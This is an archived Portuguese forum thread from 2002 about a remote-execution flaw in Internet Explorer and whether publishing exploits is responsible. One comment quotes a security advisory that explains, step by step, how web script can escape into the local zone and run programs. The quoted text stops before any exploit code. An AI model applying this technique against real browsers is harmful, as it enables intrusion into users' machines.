gildot

Topo
Sobre
FAQ
Tópicos
Autores
Preferências
Artigos
Sondagens
Propor artigo


8/3
gildicas
9/30
jobs
10/9
perguntas
10/25
press

 
O Super Bug
Contribuído por js em 19-11-02 19:31
do departamento click-me
Internet Explorer Endymion escreve "Embora uma população significativa do gildot possa ler o slashdot, acho que esta noticia é importante. Aparentemente a Wired publicou um artigo acerca de um bug no Internet Explorer que permite que certos web-sites e emails lidos por outlook tomem controle de um computador através de um processo tao simples como fazer um click para certo link. O site avisa que tal bug permite ao dono do site fazer praticamente o que lhe apetecer, incluindo a possibilidade discutida no slashdot de formatar o disco rigido. Não existe nenhum patch e firewalls/antivirus sao totalmente inuteis.. O site presente no segundo link aqui dado apresenta algumas medidas de prevenção. Mas cá para mim seria melhor para quem tiver Windows instalar Opera ou Mozilla :p "
[js: Mas a verdadeira polémica gira em torno desta frase: "Simple, working exploit software was recently published to a public mailing list." E pergunta o slashdot: Isto é irresponsável ou não?]

SWERC'2002 - Concurso Internacional de Programação | Internet World 2002 Out?  >

 

gildot Login
Login:

Password:

Referências
  • gildot
  • Wired
  • Endymion
  • slashdot
  • esta
  • artigo
  • Mais acerca Internet Explorer
  • Também por js
  • Esta discussão foi arquivada. Não se pode acrescentar nenhum comentário.
    Será por isso? (Pontos:1, Lança-chamas)
    por mlopes em 19-11-02 21:29 GMT (#1)
    (Utilizador Info)
    Será por isso que o site curriculum.com.br só aceita IE?
    Agora um pouco mais a sério! CADA UM TEM O QUE MERECE!
    Se um (l)user tiver o seu disco formatado, pode ser que da próxima vez pense duas vezes antes de usar o IE ou pior o Outlook!

    If you don't have time to do it right, where are you going to find the time to do it over?

    Re:Será por isso? (Pontos:2)
    por mlopes em 20-11-02 11:06 GMT (#51)
    (Utilizador Info)

    ...e traz um cliente de mail!!!!

    Fantástico Mike!!!!


    If you don't have time to do it right, where are you going to find the time to do it over?

    Re:Será por isso? (Pontos:2)
    por Lameiro em 20-11-02 16:44 GMT (#69)
    (Utilizador Info) http://www.lesi4ever.com
    Também existe Mozilla para Windoze!...
    -=[ Rui Lameiro ]=-
    coitado do leitao (Pontos:0, Despropositado)
    por higuita em 19-11-02 21:45 GMT (#2)
    (Utilizador Info) http://raff.fe.up.pt/~eq92025/
    coitado do leitao...
    andou a picar os AC, agora eles estao sedentos...

    ja' estou a ver uma data de AC a tentar saber que sites o leitao usa para lhe formatar o disco... 8)

    la' vai ele ter de usar o mozilla ou o opera temporariamente
    Higuita
    Re:coitado do leitao (Pontos:0, Despropositado)
    por leitao em 19-11-02 22:55 GMT (#11)
    (Utilizador Info) http://scaletrix.com/nuno/
    Bom, eu ao menos nao deixo o Apache instalado com a configuracao por defeito nos meus web-servers ;-).

    Ve la' quem cracka quem...


    "Monogamy is for guys that can't get pussy." --Steve-O.

    Re:coitado do leitao (Pontos:2)
    por higuita em 20-11-02 16:41 GMT (#68)
    (Utilizador Info) http://raff.fe.up.pt/~eq92025/
    lolol

    eu nao estou a dizer que eu te cracko, apenas estava
    a aproveitar a situacao para gozar contigo e com os AC de sempre e as vossas interminaveis guerras, ja' que e' conhecido que usas o IE 8)

    ja' agora, o raff e' um servidor geral da FEUP, nem sequer sei se a minha conta ainda funciona, quanto mais como ele esta' configurado
    Higuita
    Re:coitado do leitao (Pontos:2)
    por leitao em 20-11-02 19:11 GMT (#74)
    (Utilizador Info) http://scaletrix.com/nuno/
    dude -- eu pus o ;-) por alguma razao.


    "Monogamy is for guys that can't get pussy." --Steve-O.

    Re:coitado do leitao (Pontos:2)
    por leitao em 20-11-02 0:59 GMT (#30)
    (Utilizador Info) http://scaletrix.com/nuno/
    Dude -- chil, ou perdeste o sentido de humor por completo ?


    "Monogamy is for guys that can't get pussy." --Steve-O.

    Re:coitado do leitao (Pontos:2)
    por jazzy em 20-11-02 9:46 GMT (#42)
    (Utilizador Info) http://www.gildot.org
    Desculpem lá... mas que raio tem o Leitão a ver com este bug?

    Porra! Já não se pode ter uma opinião diferente?


    Jazzy
    Re:coitado do leitao (Pontos:2)
    por higuita em 20-11-02 16:48 GMT (#70)
    (Utilizador Info) http://raff.fe.up.pt/~eq92025/
    nao sabes reconhecer um comentario com piada?!

    eu julgo que o leitao percebeu...

    imagina os AC todos que odeiam o leitao a vasculhar o gildot e outros sites para ver que sites o leitao usa, _so'_ para poderem ataca-lo...
    e o leitao a rir-se e a usar o opera temporariamente 8)

    Higuita
    Re:coitado do leitao (Pontos:2)
    por jazzy em 21-11-02 12:02 GMT (#78)
    (Utilizador Info) http://www.gildot.org
    Se calhar o problema é meu... mas nunca achei piada a gozarem com as outras pessoas, mas, mais uma vez, se calhar sou eu...


    Jazzy
    Re:coitado do leitao (Pontos:2)
    por leitao em 21-11-02 12:56 GMT (#79)
    (Utilizador Info) http://scaletrix.com/nuno/
    Gozar ? Obrigado pelo apoio -- mas acredita que quem goza com estes gajos todos sou eu de cada vez que entro no carro! ;-)


    "Monogamy is for guys that can't get pussy." --Steve-O.

    Re:coitado do leitao (Pontos:2)
    por jazzy em 21-11-02 15:10 GMT (#80)
    (Utilizador Info) http://www.gildot.org
    Também há essa prespectiva :-)


    Jazzy
    Re:coitado do leitao (Pontos:2)
    por ribeiro em 20-11-02 7:02 GMT (#37)
    (Utilizador Info) http://ruka12.tripod.com
    Ou então acedem do trabalho...
    *grin*
    --
    Re:coitado do leitao (Pontos:2)
    por Cyclops em 20-11-02 9:26 GMT (#39)
    (Utilizador Info) http://www.1407.org
    Um informático que acede do trabalho e não tem capacidade de mudar software no seu PC?

    *sigh* Coitado...
    Re:coitado do leitao (Pontos:3, Esclarecedor)
    por ribeiro em 20-11-02 10:43 GMT (#49)
    (Utilizador Info) http://ruka12.tripod.com
    errr... estação de trabalho "padrão" (não é fixa).
    Não tenho pass de administração, só tenho administração de servidores linux (e ainda bem!).
    Quando ando com o portatil é outra história.
    Por isso antes de mandares bocas pensa mais um bocadinho. Nem tudo é à balda como nos teus lados.
    --
    Re:coitado do leitao (Pontos:2)
    por Gimp em 20-11-02 11:10 GMT (#52)
    (Utilizador Info)
    Um "informático" que acede num sei de onde e não tem capacidade para configurar o raio do teclado? :-)


    "No comments"

    Re:coitado do leitao (Pontos:1)
    por Dante em 20-11-02 22:43 GMT (#75)
    (Utilizador Info)
    LOL PS: eu tb uso explorer
    Para quem ainda usa IE (Pontos:2)
    por Astrónomo em 19-11-02 21:48 GMT (#3)
    (Utilizador Info)
    Os problemas do IE não são apenas de segurança. Quem quiser saber mais, siga o link da minha assinatura.

    ----
    aqui porque não deves utilizar IE, Outlook, Windows Media e Messenger.

    Administração Remota (Pontos:1, Engraçado)
    por Anonimo Cobarde em 19-11-02 22:00 GMT (#4)
    o que vocês não percebem é que o IE uma ferramenta de administração remota! A MS anda muito avançada nestas coisas, tem uma grande visão.

    No futuro sempre que acederem à intranet da vossa empresa, serão automaticamente eliminados quaisquer mp3 e/ou software lúdico instalado no vosso PC
    Eliminará também qualquer rasto de software opensource e qualquer partição não-ntfs/fat que tenham configurada!
    Envia-vos o mail vindo fora de @empresa.pt para o bofh de forma a garantir o seu uso próprio restrito apenas a questões de trabalho.
    O IE é no fim de contas uma ferramenta de gestão humana, não percebo como veem bugs em features!

    Re:Administração Remota (Pontos:0, Informativo)
    por Anonimo Cobarde em 19-11-02 22:22 GMT (#6)
    +4 - Very Funny :)
    Re:Administração Remota (Pontos:1)
    por xyz em 20-11-02 9:04 GMT (#38)
    (Utilizador Info)

    Quem classificou isto como informativo está numa destas duas categorias:

    • pretende manter o espírito irónico do poster
    • anda a ler e a responder a demasiado spam

    Re:Administração Remota (Pontos:2)
    por mlopes em 20-11-02 11:13 GMT (#53)
    (Utilizador Info)
    Na volta achou que aquilo era a sério!
    Mas um engraçado merecia!

    If you don't have time to do it right, where are you going to find the time to do it over?

    Re:Administração Remota (Pontos:2)
    por Montanelas em 20-11-02 14:46 GMT (#67)
    (Utilizador Info) http://www.war-zone.net
    Qualquer Software lúdico que nã tenha a chancela da M$... :P
    Re:Administração Remota (Pontos:2)
    por higuita em 20-11-02 18:56 GMT (#72)
    (Utilizador Info) http://raff.fe.up.pt/~eq92025/
    grande ideia da M$...

    agora o PC faz quase tudo... instala coisas sem pedir, actualiza-as automaticamente, apaga o que nos interessa, vigia o que fazemos, distribui os nossos ficheiros...e o melhor e' que e' muito colorido!!

    agora so' falta ele comecar a jogar sozinho e fazer aqueles trabalhos burocraticos que nao gostamos 8)

    realmente a M$ consegue andar sempre a frente do resto...

    Higuita
    Exploits IE (Pontos:2, Interessante)
    por BlueRibbon em 19-11-02 22:04 GMT (#5)
    (Utilizador Info)
    Be afraid, be very afraid.

    É esta frase que é ecoada na minha cabeça sempre que aparece um destes bugs monumentais, que permitem o controlo quase total de um computador de outrém.

    Pessoalmente uso o Mozilla, mas nem todas as pessoas têm a minha maneira de ver as coisas e nem têm tempo para "perder" a aprender as manhas de outros browsers senão as do IE. E muitas das pessoas que conheço que não o fazem são pessoas que programam todos os dias, que têm cargos importantes, que têm trabalhos e obrigações para cumprir. Claro que é importante descobrir bugs, que é importante melhorar o sofware (mesmo que da MS) mas dar a conhecer problemas deste género ao público em geral??? Permitir que por pura diversão alguém possa estragar dias (senão semanas...) de trabalho? Para mim quem disponibiliza estes exploits é mais um criminoso. Os bugs são para ser notificados às organizações competentes, e não ao público.

    É devido a questões como esta que o pessoal que apoia o Open Source vai continuar a ser equiparado aos meninos que andam a estragar a vida aos outros, ou pensam que não passa pela cabeça dos utilizadores que estes exploits sejam descobertas graças ao Mozilla e browsers afins? (cujo projecto é grandioso e benemérito mas que muito sofre, a meu ver, com tais situações)
    KISS - Keep It Simple, Stupid!

    Re:Exploits IE (Pontos:3, Interessante)
    por CrLf em 19-11-02 22:31 GMT (#8)
    (Utilizador Info) http://crodrigues.webhop.net
    Sinceramente... Se esses bugs não forem publicados são ignorados pelas empresas a quem os cabe corrigir (o que não impede que entretanto alguém não os explore sem que os utilizadores saibam da sua existência)... a seguir vais dizer que a DMCA é excelente...

    Isso é security through obscurity.

    PS: Já agora e quanto ao pessoal que apoia o opensource fica sabendo que as distribuições se comprometeram a não divulgar os exploits durante um período de tempo após serem descobertos para permitir que já exista uma correcção aquando da divulgação (e isto porque a comunidade opensource corrige as falhas, não as atira para debaixo do tapete por tempo indefinido).

    -- Carlos Rodrigues
    Re:Exploits IE (Pontos:1)
    por BlueRibbon em 19-11-02 23:30 GMT (#21)
    (Utilizador Info)
    Acredito em tudo o que dizes, mas repara que os bugs /exploits deviam ser comunicados a organizações competentes. Por organizações competentes referia-me não só à empresa, mas a entidades reguladoras da qualidade, e outras cujo funcionamento esteja relacionado. O importante é que o grande público não tenha directo conhecimento do problema mas sim da solução.
    KISS - Keep It Simple, Stupid!
    Re:Exploits IE (Pontos:2)
    por pmsac em 20-11-02 0:25 GMT (#27)
    (Utilizador Info) http://2130706433/
    E eu que pensaava que "O importante" era o bom funcionamento das aplicações/dispositivos/etc, e não o "grande público" ter "directo conhecimento" dos problemas.

    Quanto ao que se _deve_ fazer com bugs e exploits, quem é a organização competente ? Quem introduziu o bug em primeiro lugar ? "Entidades reguladoras da qualidade" ? E porque é que _devem_ ser comunicados ? Vem na EULA ? "Todos os bugs encontrados serão propriedade de XPTO, Inc. ..."

    -- pmsac.oO(Cogito sumere potum alterum)
    Re:Exploits IE (Pontos:1)
    por HiTek DeVil em 20-11-02 1:22 GMT (#35)
    (Utilizador Info)
    Como normalmente "descartamos" os bugs nos programas, à medida que os vamos encontrando nos debugs (não é descartar, mas sim gozar um pouco com a situação): "Isso? Um bug?? nãããã... não é bug, é feature"

    :)
    HiTek DeVil
    Re:Exploits IE (Pontos:1)
    por HiTek DeVil em 21-11-02 2:29 GMT (#77)
    (Utilizador Info)
    Áfricas? Bem, para pessoal que seja do norte, e que costume dizer que abaixo de coimbra é marrocos, acredito que pareça assim, mas morar em sintra, sempre ouvi dizer que pertenceria a Lisboa, que por seu lado, seria parte integrante de Portugal, e pasmem-se, por seu lado Lisboa seria a capital de Portugal :P Portanto, por dedução, como Portugal continental está totalmente "inserido" no espaço continental denotado como europeu, e Lisboa sendo parte integrante de Portugal, então serei europeu, e não africano... embora nem pela cor da pele seria Africano... por muito moreno que chegasse a ser, continuaria demasiado caucasiano para ser confundido com Afro-whatever (neste caso, afro-portugues... embora nao sei se existirá essa designação, mas como existe para afro-americano, faz-se de conta por momentos) :)


    HiTek DeVil
    Re:Exploits IE (Pontos:2)
    por CrLf em 20-11-02 0:57 GMT (#29)
    (Utilizador Info) http://crodrigues.webhop.net
    Acho que o procedimento tomado pelas distribuições de linux é o mais correcto. Primeiro comunica-se o bug a uma organização competente (onde estão representadas as distribuições todas e outras partes interessadas - agora não me lembro qual é, input agradece-se) e passado um certo prazo comunica-se ao público em geral. Acho que a "ameaça" de divulgação do bug ao público em geral serve de incentivo (por acaso a comunidade opensource nem precisa muito) e ao mesmo tempo dá-se lhe uma oportunidade de se redimir (a quem produz o software em questão).

    A moral da história é que o público tem o direito de saber com que linhas se cose.

    -- Carlos Rodrigues
    Re:Exploits IE (Pontos:2)
    por Psiwar em 19-11-02 23:46 GMT (#22)
    (Utilizador Info) http://www.netcode.pt
    Seguindo a visão mercantilista... Porque raio é que essas pessoas vão estar a servir de beta testers e auditores de segurança para as empresas... de graça?

    Se alguém descobre um bug ou um exploit para um programa, é eticamente aconselhável dar uma oportunidade ao autor do programa de corrigir esse bug. Mas se o autor desse programa não for eticamente correcto ou então não ligar puto aos avisos de bugs/exploits porque é que não há-de ser divulgando o problema? Divulgando, ajuda os utilizadores desses programas a saber os riscos que tomam e a escolher melhor software no futuro.

    É devido a questões como esta que o pessoal que apoia o Open Source vai continuar a ser equiparado aos meninos que andam a estragar a vida aos outros

    Desculpa lá... mas o que tem o Open Source a ver com o assunto? Cracka-se o IE, alguem descobre um bug, alguem publica um exploit, e a culpa é dos "meninos do Open Source"?

    pensam que não passa pela cabeça dos utilizadores que estes exploits sejam descobertas graças ao Mozilla e browsers afins

    O Mozilla também cracka? É que ainda não descobri essa funcionalidade...
    Re:Exploits IE (Pontos:2)
    por Branc0 em 20-11-02 10:12 GMT (#45)
    (Utilizador Info) http://www.syners.org
    O Mozilla também cracka? É que ainda não descobri essa funcionalidade...

    Well, duh... vamos de noite! :)

    Com as configurações de IIS que por aí andam, basta um browser para teres uma linha de comandos remota :)


    "Se vi mais além do que outro, é porque estava nos ombros de gigantes."
    Sir Isaac Newton

    Re:Exploits IE (Pontos:0)
    por Anonimo Cobarde em 20-11-02 1:01 GMT (#31)
    "Os bugs são para ser notificados às organizações competentes, e não ao público."


    From /.

    The original public posting of the exploit was posted on Bugtraq on Nov 6 2002. The posting indicates that Microsoft was contacted on Oct 4 2002 regarding the exploit and had decided not to fix the vulnerability. Since Microsoft willfully decided not to fix this bug, I think posting working exploit code is justified in order to force Microsoft to address the problem rather than sweeping it under the carpet.

    ...e mais!

    Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response were that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone".
    Microsoft KNEW of the issue, and actually dismissed the issue, saying it was a necessary feature.

    Criminosos? Quem? Criminosa, só se for a Micro$oft...

    post esclarecedor (Pontos:2)
    por higuita em 20-11-02 19:09 GMT (#73)
    (Utilizador Info) http://raff.fe.up.pt/~eq92025/
    post esclarecedor, alguem modere isto para cima em vez de andar a moderar piadas para baixo!!
    Higuita
    Experiencia (Pontos:2)
    por Branc0 em 19-11-02 22:28 GMT (#7)
    (Utilizador Info) http://www.syners.org
    Só para avisar que pela minha experiência, ao contrário do que é dito no exploit, ele não funciona no Windows XP com o IE que vem por defeito.

    No entanto, no Windows 2000 funciona perfeitamente e torna-se trivial executar comandos como um tftp ou um net start/use/send.


    "Se vi mais além do que outro, é porque estava nos ombros de gigantes."
    Sir Isaac Newton

    Re:Experiencia (Pontos:0, Engraçado)
    por Anonimo Cobarde em 19-11-02 23:22 GMT (#18)
    Desculpa mas neste caso o IE vem mesmo "por defeito" :]
    Re:Experiencia (Pontos:2)
    por biduxe em 20-11-02 1:53 GMT (#36)
    (Utilizador Info) http://bdx.no-ip.info
    correcçãozita:
    não vem por defeito, vem por "característica"
    ------ EOFim.
    Re:Experiencia (Pontos:2)
    por mlopes em 20-11-02 11:19 GMT (#54)
    (Utilizador Info)
    De facto são tudo palavras que se aplicam ao IE, imperfeição, deformidade, vício, mancha, inconveniente! A "falta de alguma coisa" tambêm se aplica, se eu tiver um windows só com o IE, de certeza que vou sentir a falta do Mozilla!

    If you don't have time to do it right, where are you going to find the time to do it over?

    Ate parece que o IE eh o unico (Pontos:0, Interessante)
    por Anonimo Cobarde em 19-11-02 23:11 GMT (#15)
    Como de costume o fanatismo e a estupidez continua a ser rei e senhor aqui no gildot.
    Ate parece que o IE é o unico browser cheio de buracos... Ate parece que o Opera 7 beta acabado de lancar nao tinha 2 buracoes triviais de exploit... E ate parece que o tao amado pelos fanaticos do open source chamado Mozilla ate tem buracos importantes patchados que nao sao anunciados em publico, apenas nos change logs para quem se der ao trabalho de os verificar.
    Pois é fanatismo é como os burros com palas, so olham para a frente...
    Btw nao sou o Leitao ou algum M$ lover... Gosto é pouco de fanatismos idioticos do tipo so ver OPEN SOURCE à frente.
    Arranjem argumentos decentes para criticar as coisas... Vejam la se o tiro nao sai pela culatra com um exploit bem pior para o mozilla...
    Re:Ate parece que o IE eh o unico (Pontos:2)
    por TarHai em 20-11-02 0:25 GMT (#28)
    (Utilizador Info) http://www.dilbert.com
    Por uma questao de principio, confio mais em software aberto que em software fechado. Ja muita tinta correu sobre as razoes por que acredito nisso.

    Nao e como se a micromole tivesse tambem o monopolio de erros, lapsos e negligencia, basta ver os updates de qualquer distro para perceber que nao e assim.

    Acho q a microsoft fez alguns programas que funcionam bem. Infelizmente, motivada por questoes de mercado e poder sobre os consumidores, fez outros programas que funcionam so suficientemente bem para poderem ser dados ou vendidos. Sao estrategias que resultam a curto e medio prazo, mas que trazem dores de cabeca a longo prazo.


    --- "Esta voz!?!..." Cpt Francis Blake -- S.O.S. Meteoros
    Re:Ate parece que o IE eh o unico (Pontos:1, Lança-chamas)
    por leitao em 20-11-02 1:13 GMT (#33)
    (Utilizador Info) http://scaletrix.com/nuno/
    Vejam la se o tiro nao sai pela culatra com um exploit bem pior para o mozilla...

    Nao precisas -- ja' ha' 6.


    "Monogamy is for guys that can't get pussy." --Steve-O.

    Re:Ate parece que o IE eh o unico (Pontos:2)
    por Dehumanizer em 20-11-02 9:35 GMT (#40)
    (Utilizador Info)
    Todos corrigidos.


    "To underestimate one's self is as much a departure from truth as to exaggerate one's own powers"
    - Sherlock Holmes
    Re:Ate parece que o IE eh o unico (Pontos:2)
    por jazzy em 20-11-02 9:59 GMT (#43)
    (Utilizador Info) http://www.gildot.org
    Bem... o tipo que nunca escreveu código com bugs que atire a primeira pedra!

    Já quanto à atitude "isso não é um bug, é uma feature" muitos comentários pouco abonatórios se podem fazer...


    Jazzy
    Re:Ate parece que o IE eh o unico (Pontos:2)
    por mlopes em 20-11-02 11:32 GMT (#56)
    (Utilizador Info)
    E o facto de a Microsoft não ter o exclusivo dos bugs faz com que um bug desta importância deixe de ser notícia? E se calhar uma notícia que interessa mais a vocês (utilizadores do IE que têm feito estes comentários) do que a mim que não uso Windows e muito menos IE!
    Antes de fazerem criticas por ter sido publicado o bug aqui e noutros sites, pensa como é que preferes saber da existência do bug, através de uma notícia no Gildot ou quando estiveres a navegar na net e alguêm te formatar o disco?

    If you don't have time to do it right, where are you going to find the time to do it over?

    Re:Ate parece que o IE eh o unico (Pontos:2)
    por leitao em 20-11-02 12:16 GMT (#59)
    (Utilizador Info) http://scaletrix.com/nuno/
    através de uma notícia no Gildot ou quando estiveres a navegar na net e alguêm te formatar o disco?

    Essa da formatacao do disco e' um bocado uma falacia -- qualquer utilizador que se prese nao vai correr o IE comunmente sobre uma conta priviligiada -- logo, nao estou a ver isto a ocorrer tao frequentemente como isso.


    "Monogamy is for guys that can't get pussy." --Steve-O.

    Re:Ate parece que o IE eh o unico (Pontos:2)
    por mlopes em 20-11-02 12:37 GMT (#61)
    (Utilizador Info)
    Um utilizador do windows regra geral não faz ideia do que seja uma conta privilegiada e mesmo em NT/2000 usam o computador como "Adminitrator", já vi por ai alguem a dizer que no Win XP o bug não existe, se calhar porque está a tentar explorar o bug como utilizador não privilegiado!

    If you don't have time to do it right, where are you going to find the time to do it over?

    Re:Ate parece que o IE eh o unico (Pontos:2)
    por mlopes em 20-11-02 12:57 GMT (#64)
    (Utilizador Info)
    Informação tirada daqui

    TESTED: Win2000 pro, XP, IE 6 (latest patches).

    Agora que o bug é do conhecimento público, não me parece que eles continuem a insistir em não o corrigir, basta algum maluco se lembrar de perder tempo a fazer um worm que se instale em webservers a tentar explorar a falha a quem aceder ao webserver infectado, que seria uma autentica catástrofe!

    If you don't have time to do it right, where are you going to find the time to do it over?

    Re:Ate parece que o IE eh o unico (Pontos:2)
    por Branc0 em 20-11-02 10:06 GMT (#44)
    (Utilizador Info) http://www.syners.org
    Deixa-me cá defender o Opera :)

    Ate parece que o IE é o unico browser cheio de buracos... Ate parece que o Opera 7 beta acabado de lancar nao tinha 2 buracoes triviais de exploit...

    Which part in Beta you don't understand?


    "Se vi mais além do que outro, é porque estava nos ombros de gigantes."
    Sir Isaac Newton

    Re:Ate parece que o IE eh o unico (Pontos:3, Engraçado)
    por js em 20-11-02 10:54 GMT (#50)
    (Utilizador Info)
    Como de costume o fanatismo e a estupidez continua a ser rei e senhor aqui no gildot.

    Como de costume, o Gildot é salvo da sua estupidez militante pelas Luminosas Contribuições dos seus mais Corajosos Anónimos! Um grande bem-haja, oh Luz Radiosa que ilumina os nossos passos! Ficai! Derramai sobre as nossas mentes resequidas e sequiosas as férteis gotas da Vossa Preciosa Sabedoria! Ajudai-nos! Guiai-nos! Não nos deixeis sucumbir novamente ao breu da ignorância! São raros momentos como este, que na Vossa Infinita Generosidade nos ofereceis, que fazem a nossa pobre vida ter sentido! Aleluia, Salvador!

    A Vossa Preciosa Contribuição ficará para sempre gravada nos anais (oops..) do Gildot! Infelizmente, o Vosso Nome não pode ser nomeado, pois é desconhecido de nós, mortais, e nós na nossa fraqueza carecemos de um nome para nos referirmos às Coisas Maravilhosas. Mas a vossa mensagem traz-nos a Luz, e sereis portanto chamado de Portador da Luz.

    Ate parece que o IE é o unico browser cheio de buracos...

    Até parece que alguém disse isso...

    Estimado Portador da Luz, atentai na notícia que está publicada! Ela fala-nos, dir-se-ia que nos sussurra carinhosamente, que há um bug no IE. Será tal falso? Incómodo? Ofensivo? Não nos parece. De resto, a Vossa Iluminada Contribuição também não contesta aquelas afirmações. Diz antes, com Grande Sabedoria, que há outras coisas com erros. Ora, muito obrigado! Nós, pobres ignorantes e estúpidos, nunca nos teríamos apercebido disso sem o Vosso Atempado Alerta! Sagazmente vos haveis apercebido dessa nossa fraqueza, e oportunamente nos viestes oferecer guia!

    Podíeis ter-nos alertado para outros Grandes Problemas da Humanidade, como os buracos das estradas ou o colesterol dos cachorros-quentes, tudo problemas de que estupidamente não falamos ao referir o Bug do IE...

    É assim, uma notícia é uma notícia e nós, na nossa imensa fraqueza e estupidez, somos incapazes de publicar uma notícia e ao mesmo tempo publicar as outras todas. Grave falha nossa, mas (ai de nós!) não conseguimos melhor... E sim, é preciso alertar os nossos toldados leitores para que, quando uma notícia é publicada no Gildot, não fiquem a pensar que aquela é a única notíca que existe na Biosfera! Obrigado, ó Portador da Luz!

    Ate parece que o Opera 7 beta acabado de lancar nao tinha 2 buracoes triviais de exploit... E ate parece que o tao amado pelos fanaticos do open source chamado Mozilla ate tem buracos importantes patchados que nao sao anunciados em publico, apenas nos change logs para quem se der ao trabalho de os verificar.

    Até parece que no Gildot não se publicam notícias de defeitos de software open source. A mim, vesgo e iludido, até me tinha parecido que ante s de ontem apareceu uma... mas enganei-me, decerto. Bem haja, Ó Portador da Luz!

    Pois é fanatismo é como os burros com palas, so olham para a frente... Btw nao sou o Leitao ou algum M$ lover... Gosto é pouco de fanatismos idioticos do tipo so ver OPEN SOURCE à frente. Arranjem argumentos decentes para criticar as coisas... Vejam la se o tiro nao sai pela culatra com um exploit bem pior para o mozilla...

    Obrigado, Ó Portador da Luz, pelos argumentos decentes que arranjasteis para criticar os míseros farrapos de texto que desleixadamente publicámos neste contentor de refugo a que ousamos chamar Gildot. A Luz que nos mostrais é pura! É brilhante como o mais brilhante laser, é Recta como o mais coerente laser! Não se dispersa como o mais Concentrado laser, e como o mais Uniforme laser aponta para uma única direcção! Podemos finalmente deitar fora as nossas velhas e gastas palas de burros! Como o laser, a luz que nos mostrais é muito mais perfeita e, como convosco, também a nós nos há-de ajudar a não olhar para mais lado nenhum!

    Muito, muito obrigado, ó Portador da Luz! Contai connosco, Vossos servos, caso seja precisa ajuda para mudar as vossas pilhas!

    Re:Ate parece que o IE eh o unico (Pontos:2)
    por mlopes em 20-11-02 11:38 GMT (#57)
    (Utilizador Info)
    Este é sem dúvida alguma o melhor comentário que já li até hoje no Gildot, até as lágrimas me vieram ao olhos de tanto rir, em determinados momentos não pude mesmo conter algumas gargalhadas!

    If you don't have time to do it right, where are you going to find the time to do it over?

    Re:Ate parece que o IE eh o unico (Pontos:2)
    por jazzy em 20-11-02 12:03 GMT (#58)
    (Utilizador Info) http://www.gildot.org
    Bem... eu sei que isto é redundante (venham daí essas moderações!), mesmo assim:

    Clap, clap, clap!!!!! Fantástico!!! Suberbo!!! Magnífico!!!

    Obrigado js por este momento delicioso. Muitos mais como este!


    Jazzy
    Re:Ate parece que o IE eh o unico (Pontos:2)
    por Psiwar em 20-11-02 14:06 GMT (#65)
    (Utilizador Info) http://www.netcode.pt
    O "portador da luz" não merecia uma resposta com tal qualidade... mas nós agradecemos js. Sempre nos divertimos um bocado. :)
    Re:Ate parece que o IE eh o unico (Pontos:2)
    por mlopes em 20-11-02 11:28 GMT (#55)
    (Utilizador Info)
    Se não gostas de fanatismos podes começar a tentar acabar com o fanatismo... deixando tu de ser fanático!

    1- A notícia não é sobre um bug no Opera 7, a que propósito é este para aqui chamado?

    2- A notícia não é sobre um bug no Mozilla, porque que este tambêm está a ser para aqui chamado

    3- Fantatismo e estupidez- Esta deveria ser a moderação ao teu comentário.

    4- Arrangem argumentos decentes para criticar as coisas? Mas de quê que estás a falar? És assim tão idiota que não distingues uma critica de uma notícia sobre um bug?

    5- Não me lembro de ter visto estes teus comentários idiotas em artigos como "OpenSource Backdoors", "Vulnerabilidades no BIND 4 e 8" ou outros do género? Guarda lá o teu fanatismo pelos produtos da Microsoft e volta lá para o teu buraco!

    If you don't have time to do it right, where are you going to find the time to do it over?

    How to execute programs with parameters in IE (Pontos:1, Interessante)
    por Anonimo Cobarde em 20-11-02 0:04 GMT (#25)
    - Sandblad advisory #10 -

    ----------------------------------------------------------------
    Title: "How to execute programs with parameters in IE"
    Date: [2002-11-06]
    Software: Internet Explorer (webbrowser control)
    Vendor: http://www.microsoft.com/
    Impact: Javascr1pt in "Internet zone" may
                            execute programs with parameters _ _
                                                                                                      o' \,=./ `o
    Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

    TABLE OF CONTENTS:
    ==================
    Introduction ................................................. 1
    Vendor status ................................................ 2
    Details ...................................................... 3
    Exploit ...................................................... 4
    Disclaimer ................................................... 5
    Feedback ..................................................... 6

    (1) INTRODUCTION:
    =================
    By default all internet contents such as homepages are placed in the
    "Internet zone". Local content viewed in IE runs in the "Local computer
    zone" with less restrictions.

    In the past we have seen many vulnerabilities where scr1pt in the
    "Internet zone" could access the "Local computer zone". The scr1pt could
    do actions like:
    - Read local files if the exact path is known and file can be opened by
    IE.
    - Execute local programs (exact path required) WITHOUT parameters using
    the codebase attack.

    It will be shown in this document how scr1pt in the "Local computer zone"
    can actually be designed to run arbitrary programs WITH parameters (exact
    path not needed). The technique used may open up far more dangerous
    attacks than seen before.

    (2) VENDOR STATUS:
    ==================
    Microsoft was initially contacted 2002-10-04. After several mail
    exchanges, their final response were that the technique used to run
    programs with parameters from the "Local computer zone" was no security
    vulnerability. A fix should instead be applied for all possibilities for
    content in the "Internet zone" to access the "Local computer zone".

    (3) DETAILS:
    ============
    Javascr1pt can use the showHelp command to do one of the following two
    operations:
    1. Open a local compiled help file (.chm) in a separate winhelp window.
    2. Open an url (must begin with http://) in a separate winhelp window.
    SCR1PT in window opened as (1) may use the shortcut command (activeX
    control) to run programs with parameters, but (2) may not. Nothing
    strange, normal security restrictions.

    After some investigations I found a way to make (2) use the shortcut
    command. The following must be done:
    3. SCR1PT in (2) gets access to the "Local computer zone".
    4. SCR1PT in (2) changes url to "mk:@MSITStore:C:" or similiar.
    5. A local compiled help file must have been opened since IE was first
    started. Any help file will do. For example showHelp("iexplore.chm").

    In order to achieve (3) there are several nonpatched "cross site/zone
    scr1pting" vulnerabilites to use. To achieve (4) a new window must be
    created from (2). By using the "opener" object it is possible to keep
    control of the winhelp window (2) even after the url is changed. (5) is
    trivial to achieve and will not affect the winhelp window for (2), since
    it is opened in a different window by default.

    Before MS02-055 was released by Microsoft the above were a lot more easier
    to perform. (3) and (4) could then be skipped.

    (4) EXPLOIT:
    ============
    The exploit uses a nonpatched "cross site/zone scr1pting" vulnerability
    published by Liu Die Yu 2002-10-01 to Bugtraq:
    http://online.securityfocus.com/archive/1/293692
    It could also be possible to use one of the many "cross site/zone
    scr1pting" vulnerabilities Greymagic found:
    http://sec.greymagic.com/adv/gm012-ie/
    Recently I reported a new "cross site/zone scr1pting" vulnerability to
    Microsoft that could also be used. But since no patch is yet produced,
    information about it will not be published.

